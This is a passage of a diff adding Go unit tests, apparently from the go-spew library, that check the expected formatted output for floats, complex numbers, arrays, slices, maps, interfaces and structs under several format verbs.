+ v2 := float64(3.1415926) + nv2 := (*float64)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "float64" + v2s := "3.1415926" + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s) + addFormatterTest("%#v", nv2, "(*"+v2t+")"+"") + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"") +} + +func addComplexFormatterTests() { + // Standard complex64. + v := complex(float32(6), -2) + nv := (*complex64)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "complex64" + vs := "(6-2i)" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Standard complex128. 
+ v2 := complex(float64(-6), 2) + nv2 := (*complex128)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "complex128" + v2s := "(-6+2i)" + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s) + addFormatterTest("%#v", nv2, "(*"+v2t+")"+"") + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"") +} + +func addArrayFormatterTests() { + // Array containing standard ints. 
+ v := [3]int{1, 2, 3} + nv := (*[3]int)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "[3]int" + vs := "[1 2 3]" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Array containing type with custom formatter on pointer receiver only. + v2 := [3]pstringer{"1", "2", "3"} + nv2 := (*[3]pstringer)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "[3]spew_test.pstringer" + v2sp := "[stringer 1 stringer 2 stringer 3]" + v2s := v2sp + if spew.UnsafeDisabled { + v2s = "[1 2 3]" + } + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2sp) + addFormatterTest("%v", &pv2, "<**>"+v2sp) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2sp) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2sp) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2sp) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2sp) + addFormatterTest("%#v", nv2, "(*"+v2t+")"+"") + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2sp) + addFormatterTest("%#+v", &pv2, 
"(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2sp) + addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"") + + // Array containing interfaces. + v3 := [3]interface{}{"one", int(2), uint(3)} + nv3 := (*[3]interface{})(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "[3]interface {}" + v3t2 := "string" + v3t3 := "int" + v3t4 := "uint" + v3s := "[one 2 3]" + v3s2 := "[(" + v3t2 + ")one (" + v3t3 + ")2 (" + v3t4 + ")3]" + addFormatterTest("%v", v3, v3s) + addFormatterTest("%v", pv3, "<*>"+v3s) + addFormatterTest("%v", &pv3, "<**>"+v3s) + addFormatterTest("%+v", nv3, "") + addFormatterTest("%+v", v3, v3s) + addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s) + addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s) + addFormatterTest("%+v", nv3, "") + addFormatterTest("%#v", v3, "("+v3t+")"+v3s2) + addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s2) + addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s2) + addFormatterTest("%#v", nv3, "(*"+v3t+")"+"") + addFormatterTest("%#+v", v3, "("+v3t+")"+v3s2) + addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s2) + addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s2) + addFormatterTest("%#+v", nv3, "(*"+v3t+")"+"") +} + +func addSliceFormatterTests() { + // Slice containing standard float32 values. 
+ v := []float32{3.14, 6.28, 12.56} + nv := (*[]float32)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "[]float32" + vs := "[3.14 6.28 12.56]" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Slice containing type with custom formatter on pointer receiver only. + v2 := []pstringer{"1", "2", "3"} + nv2 := (*[]pstringer)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "[]spew_test.pstringer" + v2s := "[stringer 1 stringer 2 stringer 3]" + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s) + addFormatterTest("%#v", nv2, "(*"+v2t+")"+"") + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%#+v", nv2, 
"(*"+v2t+")"+"") + + // Slice containing interfaces. + v3 := []interface{}{"one", int(2), uint(3), nil} + nv3 := (*[]interface{})(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "[]interface {}" + v3t2 := "string" + v3t3 := "int" + v3t4 := "uint" + v3t5 := "interface {}" + v3s := "[one 2 3 ]" + v3s2 := "[(" + v3t2 + ")one (" + v3t3 + ")2 (" + v3t4 + ")3 (" + v3t5 + + ")]" + addFormatterTest("%v", v3, v3s) + addFormatterTest("%v", pv3, "<*>"+v3s) + addFormatterTest("%v", &pv3, "<**>"+v3s) + addFormatterTest("%+v", nv3, "") + addFormatterTest("%+v", v3, v3s) + addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s) + addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s) + addFormatterTest("%+v", nv3, "") + addFormatterTest("%#v", v3, "("+v3t+")"+v3s2) + addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s2) + addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s2) + addFormatterTest("%#v", nv3, "(*"+v3t+")"+"") + addFormatterTest("%#+v", v3, "("+v3t+")"+v3s2) + addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s2) + addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s2) + addFormatterTest("%#+v", nv3, "(*"+v3t+")"+"") + + // Nil slice. 
+ var v4 []int + nv4 := (*[]int)(nil) + pv4 := &v4 + v4Addr := fmt.Sprintf("%p", pv4) + pv4Addr := fmt.Sprintf("%p", &pv4) + v4t := "[]int" + v4s := "" + addFormatterTest("%v", v4, v4s) + addFormatterTest("%v", pv4, "<*>"+v4s) + addFormatterTest("%v", &pv4, "<**>"+v4s) + addFormatterTest("%+v", nv4, "") + addFormatterTest("%+v", v4, v4s) + addFormatterTest("%+v", pv4, "<*>("+v4Addr+")"+v4s) + addFormatterTest("%+v", &pv4, "<**>("+pv4Addr+"->"+v4Addr+")"+v4s) + addFormatterTest("%+v", nv4, "") + addFormatterTest("%#v", v4, "("+v4t+")"+v4s) + addFormatterTest("%#v", pv4, "(*"+v4t+")"+v4s) + addFormatterTest("%#v", &pv4, "(**"+v4t+")"+v4s) + addFormatterTest("%#v", nv4, "(*"+v4t+")"+"") + addFormatterTest("%#+v", v4, "("+v4t+")"+v4s) + addFormatterTest("%#+v", pv4, "(*"+v4t+")("+v4Addr+")"+v4s) + addFormatterTest("%#+v", &pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")"+v4s) + addFormatterTest("%#+v", nv4, "(*"+v4t+")"+"") +} + +func addStringFormatterTests() { + // Standard string. + v := "test" + nv := (*string)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "string" + vs := "test" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") +} + +func addInterfaceFormatterTests() { + // Nil interface. 
+ var v interface{} + nv := (*interface{})(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "interface {}" + vs := "" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Sub-interface. + v2 := interface{}(uint16(65535)) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "uint16" + v2s := "65535" + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s) + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s) +} + +func addMapFormatterTests() { + // Map with string keys and int vals. 
+ v := map[string]int{"one": 1, "two": 2} + nilMap := map[string]int(nil) + nv := (*map[string]int)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "map[string]int" + vs := "map[one:1 two:2]" + vs2 := "map[two:2 one:1]" + addFormatterTest("%v", v, vs, vs2) + addFormatterTest("%v", pv, "<*>"+vs, "<*>"+vs2) + addFormatterTest("%v", &pv, "<**>"+vs, "<**>"+vs2) + addFormatterTest("%+v", nilMap, "") + addFormatterTest("%+v", nv, "") + addFormatterTest("%+v", v, vs, vs2) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs, "<*>("+vAddr+")"+vs2) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs, + "<**>("+pvAddr+"->"+vAddr+")"+vs2) + addFormatterTest("%+v", nilMap, "") + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs, "("+vt+")"+vs2) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs, "(*"+vt+")"+vs2) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs, "(**"+vt+")"+vs2) + addFormatterTest("%#v", nilMap, "("+vt+")"+"") + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs, "("+vt+")"+vs2) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs, + "(*"+vt+")("+vAddr+")"+vs2) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs, + "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs2) + addFormatterTest("%#+v", nilMap, "("+vt+")"+"") + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Map with custom formatter type on pointer receiver only keys and vals. 
+ v2 := map[pstringer]pstringer{"one": "1"} + nv2 := (*map[pstringer]pstringer)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "map[spew_test.pstringer]spew_test.pstringer" + v2s := "map[stringer one:stringer 1]" + if spew.UnsafeDisabled { + v2s = "map[one:1]" + } + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s) + addFormatterTest("%#v", nv2, "(*"+v2t+")"+"") + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"") + + // Map with interface keys and values. 
+ v3 := map[interface{}]interface{}{"one": 1} + nv3 := (*map[interface{}]interface{})(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "map[interface {}]interface {}" + v3t1 := "string" + v3t2 := "int" + v3s := "map[one:1]" + v3s2 := "map[(" + v3t1 + ")one:(" + v3t2 + ")1]" + addFormatterTest("%v", v3, v3s) + addFormatterTest("%v", pv3, "<*>"+v3s) + addFormatterTest("%v", &pv3, "<**>"+v3s) + addFormatterTest("%+v", nv3, "") + addFormatterTest("%+v", v3, v3s) + addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s) + addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s) + addFormatterTest("%+v", nv3, "") + addFormatterTest("%#v", v3, "("+v3t+")"+v3s2) + addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s2) + addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s2) + addFormatterTest("%#v", nv3, "(*"+v3t+")"+"") + addFormatterTest("%#+v", v3, "("+v3t+")"+v3s2) + addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s2) + addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s2) + addFormatterTest("%#+v", nv3, "(*"+v3t+")"+"") + + // Map with nil interface value + v4 := map[string]interface{}{"nil": nil} + nv4 := (*map[string]interface{})(nil) + pv4 := &v4 + v4Addr := fmt.Sprintf("%p", pv4) + pv4Addr := fmt.Sprintf("%p", &pv4) + v4t := "map[string]interface {}" + v4t1 := "interface {}" + v4s := "map[nil:]" + v4s2 := "map[nil:(" + v4t1 + ")]" + addFormatterTest("%v", v4, v4s) + addFormatterTest("%v", pv4, "<*>"+v4s) + addFormatterTest("%v", &pv4, "<**>"+v4s) + addFormatterTest("%+v", nv4, "") + addFormatterTest("%+v", v4, v4s) + addFormatterTest("%+v", pv4, "<*>("+v4Addr+")"+v4s) + addFormatterTest("%+v", &pv4, "<**>("+pv4Addr+"->"+v4Addr+")"+v4s) + addFormatterTest("%+v", nv4, "") + addFormatterTest("%#v", v4, "("+v4t+")"+v4s2) + addFormatterTest("%#v", pv4, "(*"+v4t+")"+v4s2) + addFormatterTest("%#v", &pv4, "(**"+v4t+")"+v4s2) + addFormatterTest("%#v", nv4, "(*"+v4t+")"+"") + addFormatterTest("%#+v", 
v4, "("+v4t+")"+v4s2) + addFormatterTest("%#+v", pv4, "(*"+v4t+")("+v4Addr+")"+v4s2) + addFormatterTest("%#+v", &pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")"+v4s2) + addFormatterTest("%#+v", nv4, "(*"+v4t+")"+"") +} + +func addStructFormatterTests() { + // Struct with primitives. + type s1 struct { + a int8 + b uint8 + } + v := s1{127, 255} + nv := (*s1)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "spew_test.s1" + vt2 := "int8" + vt3 := "uint8" + vs := "{127 255}" + vs2 := "{a:127 b:255}" + vs3 := "{a:(" + vt2 + ")127 b:(" + vt3 + ")255}" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%+v", v, vs2) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs2) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs2) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs3) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs3) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs3) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs3) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs3) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs3) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Struct that contains another struct. 
+ type s2 struct { + s1 s1 + b bool + } + v2 := s2{s1{127, 255}, true} + nv2 := (*s2)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "spew_test.s2" + v2t2 := "spew_test.s1" + v2t3 := "int8" + v2t4 := "uint8" + v2t5 := "bool" + v2s := "{{127 255} true}" + v2s2 := "{s1:{a:127 b:255} b:true}" + v2s3 := "{s1:(" + v2t2 + "){a:(" + v2t3 + ")127 b:(" + v2t4 + ")255} b:(" + + v2t5 + ")true}" + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%+v", v2, v2s2) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s2) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s2) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%#v", v2, "("+v2t+")"+v2s3) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s3) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s3) + addFormatterTest("%#v", nv2, "(*"+v2t+")"+"") + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s3) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s3) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s3) + addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"") + + // Struct that contains custom type with Stringer pointer interface via both + // exported and unexported fields. 
+ type s3 struct { + s pstringer + S pstringer + } + v3 := s3{"test", "test2"} + nv3 := (*s3)(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "spew_test.s3" + v3t2 := "spew_test.pstringer" + v3s := "{stringer test stringer test2}" + v3sp := v3s + v3s2 := "{s:stringer test S:stringer test2}" + v3s2p := v3s2 + v3s3 := "{s:(" + v3t2 + ")stringer test S:(" + v3t2 + ")stringer test2}" + v3s3p := v3s3 + if spew.UnsafeDisabled { + v3s = "{test test2}" + v3sp = "{test stringer test2}" + v3s2 = "{s:test S:test2}" + v3s2p = "{s:test S:stringer test2}" + v3s3 = "{s:(" + v3t2 + ")test S:(" + v3t2 + ")test2}" + v3s3p = "{s:(" + v3t2 + ")test S:(" + v3t2 + ")stringer test2}" + } + addFormatterTest("%v", v3, v3s) + addFormatterTest("%v", pv3, "<*>"+v3sp) + addFormatterTest("%v", &pv3, "<**>"+v3sp) + addFormatterTest("%+v", nv3, "") + addFormatterTest("%+v", v3, v3s2) + addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s2p) + addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s2p) + addFormatterTest("%+v", nv3, "") + addFormatterTest("%#v", v3, "("+v3t+")"+v3s3) + addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s3p) + addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s3p) + addFormatterTest("%#v", nv3, "(*"+v3t+")"+"") + addFormatterTest("%#+v", v3, "("+v3t+")"+v3s3) + addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s3p) + addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s3p) + addFormatterTest("%#+v", nv3, "(*"+v3t+")"+"") + + // Struct that contains embedded struct and field to same struct. 
+ e := embed{"embedstr"} + v4 := embedwrap{embed: &e, e: &e} + nv4 := (*embedwrap)(nil) + pv4 := &v4 + eAddr := fmt.Sprintf("%p", &e) + v4Addr := fmt.Sprintf("%p", pv4) + pv4Addr := fmt.Sprintf("%p", &pv4) + v4t := "spew_test.embedwrap" + v4t2 := "spew_test.embed" + v4t3 := "string" + v4s := "{<*>{embedstr} <*>{embedstr}}" + v4s2 := "{embed:<*>(" + eAddr + "){a:embedstr} e:<*>(" + eAddr + + "){a:embedstr}}" + v4s3 := "{embed:(*" + v4t2 + "){a:(" + v4t3 + ")embedstr} e:(*" + v4t2 + + "){a:(" + v4t3 + ")embedstr}}" + v4s4 := "{embed:(*" + v4t2 + ")(" + eAddr + "){a:(" + v4t3 + + ")embedstr} e:(*" + v4t2 + ")(" + eAddr + "){a:(" + v4t3 + ")embedstr}}" + addFormatterTest("%v", v4, v4s) + addFormatterTest("%v", pv4, "<*>"+v4s) + addFormatterTest("%v", &pv4, "<**>"+v4s) + addFormatterTest("%+v", nv4, "") + addFormatterTest("%+v", v4, v4s2) + addFormatterTest("%+v", pv4, "<*>("+v4Addr+")"+v4s2) + addFormatterTest("%+v", &pv4, "<**>("+pv4Addr+"->"+v4Addr+")"+v4s2) + addFormatterTest("%+v", nv4, "") + addFormatterTest("%#v", v4, "("+v4t+")"+v4s3) + addFormatterTest("%#v", pv4, "(*"+v4t+")"+v4s3) + addFormatterTest("%#v", &pv4, "(**"+v4t+")"+v4s3) + addFormatterTest("%#v", nv4, "(*"+v4t+")"+"") + addFormatterTest("%#+v", v4, "("+v4t+")"+v4s4) + addFormatterTest("%#+v", pv4, "(*"+v4t+")("+v4Addr+")"+v4s4) + addFormatterTest("%#+v", &pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")"+v4s4) + addFormatterTest("%#+v", nv4, "(*"+v4t+")"+"") +} + +func addUintptrFormatterTests() { + // Null pointer. 
